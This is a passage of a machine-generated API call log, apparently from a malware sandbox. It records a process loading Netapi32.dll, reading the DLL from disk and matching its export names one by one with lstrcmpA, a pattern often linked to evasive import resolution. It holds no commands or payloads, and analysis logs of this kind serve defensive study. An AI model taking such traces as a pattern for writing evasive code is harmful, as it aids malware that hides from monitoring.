lstrcmpA (lpString1="DnsCancelQuery", lpString2="DeRefQueryBlobEx") returned 1 [0147.290] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DelaySortDAServerlist") returned 1 [0147.290] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_A") returned 1 [0147.290] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_W") returned 1 [0147.290] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAllocateRecord") returned 1 [0147.290] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAlloc") returned 1 [0147.290] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAllocZero") returned 1 [0147.290] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiFree") returned 1 [0147.290] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiHeapReset") returned 1 [0147.290] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiRealloc") returned 1 [0147.290] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiSetDebugGlobals") returned 1 [0147.290] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0147.290] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterInit") returned 1 [0147.290] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterTerm") returned 1 [0147.290] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsCancelQuery") returned 0 [0147.290] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0147.290] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0147.291] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AddRefQueryBlobEx") returned 1 [0147.291] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="BreakRecordsIntoBlob") returned 1 [0147.291] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0147.291] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="CombineRecordsInBlob") returned 1 [0147.291] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DeRefQueryBlobEx") returned 1 [0147.291] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DelaySortDAServerlist") returned 1 [0147.291] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_A") returned 1 [0147.291] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_W") returned 1 [0147.291] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAllocateRecord") returned 1 [0147.291] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAlloc") returned 1 [0147.291] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAllocZero") returned 1 [0147.291] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiFree") returned 1 [0147.291] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiHeapReset") returned 1 [0147.291] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiRealloc") returned 1 [0147.291] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiSetDebugGlobals") returned 1 [0147.291] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0147.298] GetProcessHeap () returned 0x470000 [0147.298] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3acd010 | out: hHeap=0x470000) returned 1 [0147.298] GetProcessHeap () returned 0x470000 [0147.298] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x489c10 [0147.299] LoadLibraryA (lpLibFileName="Netapi32.dll") returned 0x7ffc5cb30000 [0147.301] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0147.301] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0147.301] GetModuleFileNameA (in: hModule=0x7ffc5cb30000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")) returned 0x20 [0147.302] CreateFileA (lpFileName="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0147.302] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0147.302] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0147.302] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=80640) returned 1 [0147.302] GetProcessHeap () returned 0x470000 [0147.302] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13b00) returned 0x2d95030 [0147.302] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0147.302] ReadFile (in: hFile=0x17c, lpBuffer=0x2d95030, nNumberOfBytesToRead=0x13b00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d95030*, lpNumberOfBytesRead=0x14f5a4*=0x13b00, lpOverlapped=0x0) returned 1 [0147.303] CloseHandle (hObject=0x17c) returned 1 [0147.303] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavAddConnection") returned 1 [0147.303] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavDeleteConnection") returned 1 [0147.303] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavFlushFile") returned 1 [0147.303] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetExtendedError") returned 1 [0147.303] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetHTTPFromUNCPath") returned 1 [0147.303] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetUNCFromHTTPPath") returned 1 [0147.303] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesA") returned 1 [0147.303] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExA") returned 1 [0147.303] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExW") returned 1 [0147.303] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesW") returned 1 [0147.303] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0147.303] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0147.303] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsA") returned 1 [0147.303] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsW") returned 1 [0147.303] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcCloseW") returned 1 [0147.303] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameA") returned 1 [0147.303] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameW") returned 1 [0147.303] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountA") returned 1 [0147.303] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountW") returned 1 [0147.303] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextA") returned 1 [0147.304] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextW") returned 1 [0147.304] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenA") returned 1 [0147.304] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenW") returned 1 [0147.304] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageA") returned 1 [0147.304] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageW") returned 1 [0147.304] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetForestTrustInformationW") returned 1 [0147.304] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameA") returned 1 [0147.304] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameW") returned 1 [0147.304] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsMergeForestTrustInformationW") returned 1 [0147.304] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleFreeMemory") returned 1 [0147.304] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0147.304] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameA") returned 1 [0147.304] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameW") returned 1 [0147.304] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugCall") returned 1 [0147.304] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugTrace") returned 1 [0147.304] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0147.304] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryOtherDomains") returned 1 [0147.304] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryStatistics") returned 1 [0147.304] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetNetlogonState") returned 1 [0147.304] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetStatistics") returned 1 [0147.304] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserServerEnum") returned 1 [0147.304] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserSetNetlogonState") returned 1 [0147.304] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0147.304] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountDeltas") returned 1 [0147.304] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountSync") returned 1 [0147.304] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes") returned 1 [0147.304] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes2") returned 1 [0147.304] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseDeltas") returned 1 [0147.304] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseRedo") returned 1 [0147.304] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync") returned 1 [0147.305] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync2") returned 1 [0147.305] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsGetVersion") returned 1 [0147.305] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsIsThisADomainName") returned 1 [0147.305] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetDCList") returned 1 [0147.305] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetForestTrustInformation") returned 1 [0147.305] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl") returned 1 [0147.305] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl2") returned 1 [0147.305] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonGetDomainInfo") returned 1 [0147.305] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogoff") returned 1 [0147.305] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogon") returned 1 [0147.305] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonEx") returned 1 [0147.305] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0147.305] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSendToSam") returned 1 [0147.305] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogoff") returned 1 [0147.305] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogon") returned 1 [0147.305] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate") returned 1 [0147.305] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate2") returned 1 [0147.305] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate3") returned 1 [0147.305] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerGetTrustInfo") returned 1 [0147.305] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordGet") returned 1 [0147.305] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet") returned 1 [0147.305] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet2") returned 1 [0147.305] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerReqChallenge") returned 1 [0147.305] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBits") returned 1 [0147.306] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0147.306] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0147.306] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeClientDigest") returned 1 [0147.306] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeServerDigest") returned 1 [0147.306] lstrcmpA (lpString1="NetAccessAdd", lpString2="NetAccessAdd") returned 0 [0147.306] lstrcmpA (lpString1="NetAccessDel", lpString2="DavAddConnection") returned 1 [0147.306] lstrcmpA (lpString1="NetAccessDel", lpString2="DavDeleteConnection") returned 1 [0147.306] lstrcmpA (lpString1="NetAccessDel", lpString2="DavFlushFile") returned 1 [0147.306] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetExtendedError") returned 1 [0147.306] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetHTTPFromUNCPath") returned 1 [0147.306] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetUNCFromHTTPPath") returned 1 [0147.306] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesA") returned 1 [0147.306] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExA") returned 1 [0147.306] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExW") returned 1 [0147.306] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesW") returned 1 [0147.306] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0147.306] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0147.306] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsA") returned 1 [0147.306] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsW") returned 1 [0147.306] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcCloseW") returned 1 [0147.306] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameA") returned 1 [0147.306] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameW") returned 1 [0147.306] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountA") returned 1 [0147.306] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountW") returned 1 [0147.306] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextA") returned 1 [0147.306] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextW") returned 1 [0147.306] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenA") returned 1 [0147.306] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenW") returned 1 [0147.306] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageA") returned 1 [0147.306] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageW") returned 1 [0147.306] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetForestTrustInformationW") returned 1 [0147.306] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameA") returned 1 [0147.306] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameW") returned 1 [0147.306] lstrcmpA (lpString1="NetAccessDel", lpString2="DsMergeForestTrustInformationW") returned 1 [0147.306] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleFreeMemory") returned 1 [0147.306] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0147.307] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameA") returned 1 [0147.307] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameW") returned 1 [0147.307] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugCall") returned 1 [0147.307] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugTrace") returned 1 [0147.307] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0147.307] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryOtherDomains") returned 1 [0147.307] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryStatistics") returned 1 [0147.307] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetNetlogonState") returned 1 [0147.307] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetStatistics") returned 1 [0147.307] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserServerEnum") returned 1 [0147.307] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserSetNetlogonState") returned 1 [0147.307] lstrcmpA (lpString1="NetAccessDel", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0147.307] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountDeltas") returned 1 [0147.307] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountSync") returned 1 [0147.307] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes") returned 1 [0147.307] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes2") returned 1 [0147.307] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseDeltas") returned 1 [0147.307] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseRedo") returned 1 [0147.307] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync") returned 1 [0147.307] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync2") returned 1 [0147.307] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsGetVersion") returned 1 [0147.307] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsIsThisADomainName") returned 1 [0147.307] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetDCList") returned 1 [0147.307] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetForestTrustInformation") returned 1 [0147.307] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl") returned 1 [0147.307] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl2") returned 1 [0147.307] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonGetDomainInfo") returned 1 [0147.307] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogoff") returned 1 [0147.307] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogon") returned 1 [0147.307] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonEx") returned 1 [0147.307] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0147.307] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSendToSam") returned 1 [0147.307] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogoff") returned 1 [0147.308] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogon") returned 1 [0147.308] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate") returned 1 [0147.308] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate2") returned 1 [0147.308] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate3") returned 1 [0147.308] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerGetTrustInfo") returned 1 [0147.308] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordGet") returned 1 [0147.308] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet") returned 1 [0147.308] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet2") returned 1 [0147.308] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerReqChallenge") returned 1 [0147.308] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBits") returned 1 [0147.308] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0147.308] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0147.308] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeClientDigest") returned 1 [0147.308] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeServerDigest") returned 1 [0147.308] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessAdd") returned 1 [0147.308] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessDel") returned 0 [0147.308] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavAddConnection") returned 1 [0147.308] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavDeleteConnection") returned 1 [0147.308] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavFlushFile") returned 1 [0147.308] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetExtendedError") returned 1 [0147.308] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetHTTPFromUNCPath") returned 1 [0147.308] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetUNCFromHTTPPath") returned 1 [0147.308] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesA") returned 1 [0147.308] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExA") returned 1 [0147.308] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExW") returned 1 [0147.308] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesW") returned 1 [0147.308] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0147.308] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0147.308] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsA") returned 1 [0147.308] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsW") returned 1 [0147.308] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcCloseW") returned 1 [0147.308] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameA") returned 1 [0147.308] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameW") returned 1 [0147.308] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountA") returned 1 [0147.308] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountW") returned 1 [0147.308] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextA") returned 1 [0147.308] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextW") returned 1 [0147.309] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenA") returned 1 [0147.309] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenW") returned 1 [0147.309] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageA") returned 1 [0147.309] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageW") returned 1 [0147.309] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetForestTrustInformationW") returned 1 [0147.309] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameA") returned 1 [0147.309] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameW") returned 1 [0147.309] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsMergeForestTrustInformationW") returned 1 [0147.309] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleFreeMemory") returned 1 [0147.309] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0147.309] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameA") returned 1 [0147.309] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameW") returned 1 [0147.309] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugCall") returned 1 [0147.309] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugTrace") returned 1 [0147.309] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0147.309] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryOtherDomains") returned 1 [0147.309] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryStatistics") returned 1 [0147.309] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetNetlogonState") returned 1 [0147.309] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetStatistics") returned 1 [0147.309] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserServerEnum") returned 1 [0147.309] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserSetNetlogonState") returned 1 [0147.309] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0147.309] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountDeltas") returned 1 [0147.309] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountSync") returned 1 [0147.309] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes") returned 1 [0147.309] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes2") returned 1 [0147.309] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseDeltas") returned 1 [0147.309] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseRedo") returned 1 [0147.309] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync") returned 1 [0147.309] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync2") returned 1 [0147.309] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsGetVersion") returned 1 [0147.309] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsIsThisADomainName") returned 1 [0147.309] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetDCList") returned 1 [0147.310] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetForestTrustInformation") returned 1 [0147.310] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl") returned 1 [0147.310] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl2") returned 1 [0147.310] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonGetDomainInfo") returned 1 [0147.310] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogoff") returned 1 [0147.310] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogon") returned 1 [0147.310] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonEx") returned 1 [0147.310] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0147.310] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSendToSam") returned 1 [0147.310] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogoff") returned 1 [0147.310] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogon") returned 1 [0147.310] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate") returned 1 [0147.310] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate2") returned 1 [0147.310] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate3") returned 1 [0147.310] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerGetTrustInfo") returned 1 [0147.310] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordGet") returned 1 [0147.310] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet") returned 1 [0147.310] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet2") returned 1 [0147.310] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerReqChallenge") returned 1 [0147.310] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBits") returned 1 [0147.310] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0147.310] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0147.310] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeClientDigest") returned 1 [0147.310] 